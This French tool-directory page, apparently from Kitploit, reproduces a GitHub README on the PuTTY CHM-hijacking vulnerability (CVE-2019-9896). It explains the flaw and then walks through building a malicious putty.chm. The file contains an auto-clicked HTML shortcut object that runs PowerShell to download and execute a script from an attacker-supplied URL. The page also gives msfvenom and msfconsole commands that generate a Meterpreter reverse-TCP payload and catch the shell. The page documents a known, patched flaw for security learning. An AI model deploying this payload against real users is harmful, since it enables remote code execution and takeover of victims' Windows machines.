Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
vuln-chm-hijack — Exécution de code potentiellement malveillante via CHM hijacking (CVE-2019-9896) | Kitploit
Outils/GitHubGitHub/yasinyilmaz/vuln-chm-hijack
Outils de PhishingGénération de PayloadsExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubyasinyilmaz/vuln-chm-hijack

vuln-chm-hijack

Exécution de code potentiellement malveillante via CHM hijacking (CVE-2019-9896)

Voir le dépôt
7931il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité PuTTY vuln-chm-hijack

Exécution potentielle de code malveillant via le détournement de CHM

À propos

Jusqu'à la version 0.70 incluse, lorsque vous lanciez l'aide en ligne dans l'un des outils GUI Windows de PuTTY, l'outil localisait son fichier d'aide en regardant à côté de son propre exécutable.

Si vous exécutiez PuTTY depuis un répertoire dans lequel du code non apparenté pouvait déposer des fichiers (par exemple, en l'exécutant directement depuis le répertoire de téléchargement par défaut d'un navigateur), cela signifie que si quelqu'un parvenait à placer un fichier nommé putty.chm dans ce répertoire (par exemple, en vous incitant à cliquer sur un lien de téléchargement portant ce nom), PuTTY penserait qu'il s'agit du vrai fichier d'aide et le transmettrait à htmlhelp.exe.

Ceci est une vulnérabilité car les fichiers d'aide HTML (.chm) peuvent à leur tour exécuter du code de leur choix, par exemple en intégrant un élément HTML qui est un raccourci Windows, accompagné de JavaScript pour cliquer dessus.

Plus de détails : https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html

Qu'est-ce qu'un fichier CHM ?

CHM est une extension du format de fichier HTML compilé, le plus souvent utilisé par le programme d'aide HTML de Microsoft. Il peut contenir de nombreux documents HTML compressés ainsi que les images et le JavaScript auxquels ils renvoient. Les fonctionnalités CHM incluent une table des matières, un index et une recherche en texte intégral.

Cela a-t-il déjà été utilisé ?

Par le passé, des acteurs malveillants ont utilisé des fichiers CHM pour déposer un fichier backdoor, couramment utilisé dans les attaques ciblées.

Quelques exemples :

https://www.bleepingcomputer.com/news/security/malicious-chm-files-being-used-to-install-brazilian-banking-trojans/ https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

Procédure pour générer un fichier CHM malveillant

Nous avons besoin de la boîte à outils HTML Help Workshop pour créer un fichier CHM. Après installation, lancez l'outil HTML Help Workshop.

Étapes

Cliquez sur File > New > Project et suivez les étapes ci-dessus :

Création d'un projet d'aide HTML

  1. Écran New Project > Next > Browse

  2. Spécifiez le nom de votre fichier projet et où vous souhaitez qu'il soit créé.

Remplissez File name : putty et cliquez sur "Open"

Spécifiez votre projet d'aide HTML

  1. Si vous avez déjà créé un fichier HTML que vous souhaitez inclure dans votre projet.

Sélectionnez les fichiers HTML (.htm)

Spécifiez où se trouvent vos fichiers .htm.

Bouton Add.. et sélectionnez un répertoire déjà créé pour l'exploit afin d'y placer votre fichier malveillant, par exemple putty.htm

Sélectionnez un fichier HTM

  1. L'assistant crée un nouveau projet d'aide HTML. Nous devons apporter des modifications.

  2. Dans l'outil, double-cliquez sur le htm créé pour l'éditer, puis insérez le code ci-dessous pour créer un fichier d'aide de base :

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<Title>putty</Title>
</HEAD>
<BODY>


</BODY>
</HTML>

  1. Maintenant, nous créons un objet bouton qui lance un exe malveillant lorsqu'il est cliqué. En plus de l'objet, nous ajoutons également une partie script qui cliquera automatiquement sur le bouton lorsque le document est ouvert :
<html>
<title> PuTTY Help </title>
<head>
</head>
<body>

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -NoProfile -WindowsStyle 1 -c -IEX (New-Object Net.WebClient).DownloadString('{YOUR MALICIOUS FILE URL}')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

<h2 align=center> PuTTY CHM </h2>
<p><h3 align=center> Welcome! </h3></p>
</body>
</html>

Créer un fichier malveillant

  1. La commande PowerShell se connectera à l'URL distante listée et exécutera le meterpreter que le site renvoie. Ce script distant peut être un autre script PowerShell (.ps) ou une charge utile Meterpreter pour Windows.

Comment créer une simple charge utile TCP Meterpreter pour Windows ?

msfvenom -p windows/meterpreter/reverse_tcp LHOST={YOUR IP} LPORT={PORT } -f exe > malware.exe

Lorsque vous double-cliquez sur le bouton Aide, un putty.exe est généré en tant qu'enfant de malware.exe, qui est l'interpréteur du fichier binaire CHM. (Votre fichier malveillant putty.chm et putty.exe doivent se trouver dans le même répertoire)

Génère un malware

Comment obtenir le shell meterpreter ?

msfconsole 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost {YOUR IP}
lhost => {YOUR IP}
msf exploit(multi/handler) > set lport {PORT}
lport => {PORT}
msf exploit(multi/handler) > run

Ressources :

  1. https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html
  2. https://safe-cyberdefense.com/hide-malware-microsoft-html-interpretors/

Télécharger l’outil